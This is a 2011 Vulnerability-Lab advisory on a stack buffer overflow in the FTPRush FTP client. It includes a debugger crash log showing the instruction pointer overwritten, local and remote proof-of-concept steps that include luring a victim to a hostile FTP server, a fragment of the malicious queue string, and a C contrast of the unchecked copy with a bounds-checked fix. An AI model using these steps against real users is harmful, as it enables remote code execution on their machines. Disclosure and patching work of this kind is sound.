Document Title:
===============
FTPRush v1.1.3 - Stack Buffer Overflow Vulnerability

References (Source):
====================
http://www.youtube.com/watch?v=Fxr35RAcaUA

Release Date:
=============
2011-06-16

Vulnerability Laboratory ID (VL-ID):
====================================
54

Product & Service Introduction:
===============================
As the most up-to-date solution in FTP transfer, FTPRush is not just a fast, reliable, powerful and easy-to-use FTP program for Microsoft Windows; it is a full-featured FXP client with secure SSL/TLS encryption too. It allows you to transfer files from local to server, server to local or server to server. It allows you to fully customize the user interface on the fly. It allows you to create your own FTP scripts to do automatic jobs.

Operating Systems: Windows® 98/Me/NT4.0/2000/XP/2003/VISTA

Tabbed interface for smooth control over multiple active connections
GUI runtime customization and integrated docking; spice up the look of it all with your own style or favorites such as MS Office® 2000/XP/2003
Drag-and-drop files via an Explorer-like interface
Easiest way to FXP files from one server to another
Faster than other FTP clients at downloading or uploading files
Built-in Task Manager for you to easily schedule all kinds of jobs
Allows setting listing/downloading/uploading FTP accounts individually for one site and switching between them automatically
On-the-fly compression saves your bandwidth
Offers FTP MLSD to give a more accurate directory listing and synchronize folders
UPnP port-mapping enabled FTP client to accept incoming connections from the server
Multi-language support makes the FTP client easily translatable to your native language if it is not already done
HTTP proxy, FTP proxy, SOCKS 4 & 5 support; create different proxies and switch between them with a simple mouse click

The FTPRush software is one of the most used in the flasher, downloader and FXP scenes and has won several awards on different well-known vendor websites.
(Copy of the Vendor Homepage: http://www.ftprush.com/product-ftprush.html)

Abstract Advisory Information:
==============================
The Vulnerability-Lab team discovered a stack buffer overflow vulnerability in FTPRush, a well-known FTP client/server software. A remote attacker is able to overwrite ECX and EIP. No validation checks are performed on the length of the file endings on transfer. By passing in a long file ending string, it is possible to trigger a stack-based buffer overflow, resulting in the execution of arbitrary code.

Vulnerability Disclosure Timeline:
==================================
2010-08-03: Vendor Notification
2010-12-01: Vendor Response/Feedback
2011-06-03: Public or Non-Public Disclosure

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

Technical Details & Description:
================================
A stack-based buffer overflow vulnerability is detected in the FTPRush software. By passing in a long file ending string, it is possible to trigger a stack-based buffer overflow, resulting in the execution of arbitrary code.

--- Debug Logs ---
...
...
ModLoad: 73a30000 73a46000 C:/Windows/SysWOW64/davclnt.dll
ModLoad: 73a20000 73a28000 C:/Windows/SysWOW64/DAVHLPR.dll
ModLoad: 74d30000 74d3f000 C:/Windows/SysWOW64/wkscli.dll
ModLoad: 74d60000 74d69000 C:/Windows/SysWOW64/netutils.dll
(10e8.1504): Unknown exception - code 000006ba (first chance)
ModLoad: 68e50000 68e9e000 C:/Windows/SysWOW64/actxprxy.dll
ModLoad: 6e750000 6e988000 WPDSHEXT.dll
ModLoad: 6e750000 6e988000 C:/Windows/SysWOW64/wpdshext.dll
ModLoad: 68d90000 68e19000 C:/Windows/SysWOW64/PortableDeviceApi.dll
ModLoad: 75980000 759ad000 C:/Windows/syswow64/WINTRUST.dll
ModLoad: 74360000 7439f000 SHMEDIA.dll
ModLoad: 74360000 7439f000 C:/Windows/SysWOW64/audiodev.dll
ModLoad: 6dee0000 6e147000 C:/Windows/SysWOW64/WMVCore.DLL
ModLoad: 70d00000 70d3d000 C:/Windows/SysWOW64/WMASF.DLL
ModLoad: 72cf0000 72d21000 EhStorAPI.DLL
ModLoad: 72cf0000 72d21000 C:/Windows/SysWOW64/EhStorShell.dll
ModLoad: 66420000 66442000 C:/Windows/SysWOW64/EhStorAPI.dll
(10e8.17c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0018e700 ebx=00066d50 ecx=00019539 edx=0018e794 esi=7ee81884 edi=00190000
eip=0040f6e9 esp=0018e758 ebp=0018e994 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0xf6e9:
0040f6e9 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> gn
(10e8.17c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=77c187cd esi=00000000 edi=00000000
eip=41414141 esp=0018e338 ebp=0018e358 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246
...
...
FAULTING_IP:
+487
41414141 ??              ???
EXCEPTION_RECORD:  41414141 -- (.exr 0x41414141)
Cannot read Exception record @ 41414141

FAULTING_THREAD:  000017c4

PROCESS_NAME:  image00400000

FAULTING_MODULE: 76670000 kernel32

DEBUG_FLR_IMAGE_TIMESTAMP:  4b6bdefa

MODULE_NAME: image00400000

ERROR_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgeführt werden.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - Die Anweisung in 0x%08lx verweist auf Speicher 0x%08lx. Der Vorgang %s konnte nicht im Speicher durchgeführt werden.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141

FOLLOWUP_IP:
+487
41414141 ??              ???

FAILED_INSTRUCTION_ADDRESS:
+487
41414141 ??              ???

IP_ON_HEAP:  41414141
The fault address in not in any loaded module, please check your build's rebase
log at /bin/build_logs/timebuild/ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  41414141 -- (.cxr 0x41414141)
Unable to read context, Win32 error 0n30

ADDITIONAL_DEBUG_TEXT:
Use !findthebuild command to search for the target build information.
If the build information is available, run !findthebuild -s ; .reload to set symbol path and load symbols.
; Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[ffffffff]

LAST_CONTROL_TRANSFER:  from 77c187b9 to 41414141

BUGCHECK_STR:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_WRONG_SYMBOLS_FILL_PATTERN_41414141_STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_FILL_PATTERN_41414141_STACKIMMUNE

DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_FILL_PATTERN_41414141_STACKIMMUNE

STACK_TEXT:
00000000 image00400000+0x0

STACK_COMMAND:  .cxr 41414141 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  image00400000

FOLLOWUP_NAME:  MachineOwner

IMAGE_NAME:  C:/Program Files (x86)/FTPRush/ftprush.exe

FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_FILL_PATTERN_41414141_STACKIMMUNE_c0000005_C:_Program_Files_(x86)_FTPRush_ftprush.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_WRONG_SYMBOLS_FILL_PATTERN_41414141_STACKIMMUNE_BAD_IP_image00400000

WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/image00400000/1_1_3_0/4b6bdefa/unknown/0_0_0_0/bbbbbbb4/c0000005/41414141.htm?Retriage=1

Followup: MachineOwner
...
...
0018e34c: ntdll!LdrRemoveLoadAsDataTable+49b (77c187cd)
0018e778: image00400000+23d7ea (0063d7ea)
0018e99c: 41414141
Invalid exception stack at 41414141

Debug Logs (ALL): ../Debug/logs.txt
Pictures: ../overflow1.png ../overflow2.png ../overflow3.png

Proof of Concept (PoC):
=======================
This vulnerability can be exploited locally and remotely by attackers.

... Local Attack Way ...

1. Connect to any server
2. Advanced Transfer > Queue as
3. Queue Information > Customize
4. Then, via Customize, feed the string into the file endings field
5. EIP & ECX get overwritten by the attacker

... Remote Attack Way ...

1. Install and start an FTP server
2. Let a person with FTPRush connect to the FTP server
3. Let them open the PoC transfer file with the right code segments through the queue
4. PWN THE BOX!
62DF7CEEE7FC46CFA2B1BDB08FF770FD/
Test Queue: 20LokalC:\Users\Rem0ve\Desktop\update-feeds.txt62DF7CEEE7FC46CFA2B1BDB08FF770FD/AAAAAAAAAAAAAAA+
Test Queue: [Drive][Path][File][Settings]+[String].rfq

References:
Transfer-Queue ../PoC/RushCfg.xml
../PoC/1_1015289700.rfq

Solution - Fix & Patch:
=======================
N/A

Security Risk:
==============
A remote attacker is able to overwrite ECX and EIP. No validation checks are performed on the length of the file endings on transfer. By passing in a long file ending string, it is possible to trigger a stack-based buffer overflow, resulting in the execution of arbitrary code. The security risk of the vulnerability is estimated as critical because of the local/remote execution of arbitrary code.

Credits & Authors:
==================
Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve)

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
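The defect described in the Technical Details and Security Risk sections is an unbounded copy of the file ending into a fixed stack buffer (the `rep movs` in the debug log). The following is an added illustration, not FTPRush's code: the unchecked pattern next to a bounds-checked replacement; the buffer size ENDING_MAX, the function names and the sample queue entries are assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the fixed stack buffer that receives a file ending. */
#define ENDING_MAX 16

/* The pattern the advisory describes: the ending is copied into a fixed
 * buffer with no length check, so an oversized string runs past the buffer
 * into the saved registers and return address (the 41414141 in the log).
 * Kept only for contrast; nothing below calls it. */
void copy_ending_unchecked(char *dst, const char *ending)
{
    strcpy(dst, ending); /* no bound on the source length */
}

/* Hardened form: refuse anything that does not fit (including the NUL),
 * copy with an explicit bound and always terminate. Returns 0 or -1. */
int copy_ending_checked(char *dst, size_t dstlen, const char *ending)
{
    size_t n = strlen(ending);
    if (dstlen == 0 || n >= dstlen)
        return -1;
    memcpy(dst, ending, n + 1);
    return 0;
}

/* Take the ending (text after the last '.') of a queue entry's path and
 * validate it through copy_ending_checked. Returns 0 or -1. */
int ending_from_entry(const char *entry, char *out, size_t outlen)
{
    const char *dot = strrchr(entry, '.');
    if (dot == NULL || dot[1] == '\0')
        return -1;
    return copy_ending_checked(out, outlen, dot + 1);
}

int main(void)
{
    char buf[ENDING_MAX];
    char bad[80] = "C:\\Users\\test\\file."; /* constructed entries */
    size_t len = strlen(bad);
    memset(bad + len, 'A', 40); /* 40-byte ending, like the PoC's AAAA... */
    bad[len + 40] = '\0';

    int rc = ending_from_entry("C:\\Users\\test\\update-feeds.txt", buf, sizeof buf);
    printf("good entry: rc=%d ending=%s\n", rc, buf); /* rc=0 ending=txt */
    printf("long entry: rc=%d\n", ending_from_entry(bad, buf, sizeof buf)); /* rc=-1 */
    return 0;
}
```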
Domains:    www.vulnerability-lab.com   - www.vuln-lab.com   - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by the Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the Vulnerability-Lab team and the specific authors or managers. To record, list (feed), modify, use or edit our material, contact admin@vulnerability-lab.com or support@vulnerability-lab.com to get permission.

Copyright © 2012 | Vulnerability Laboratory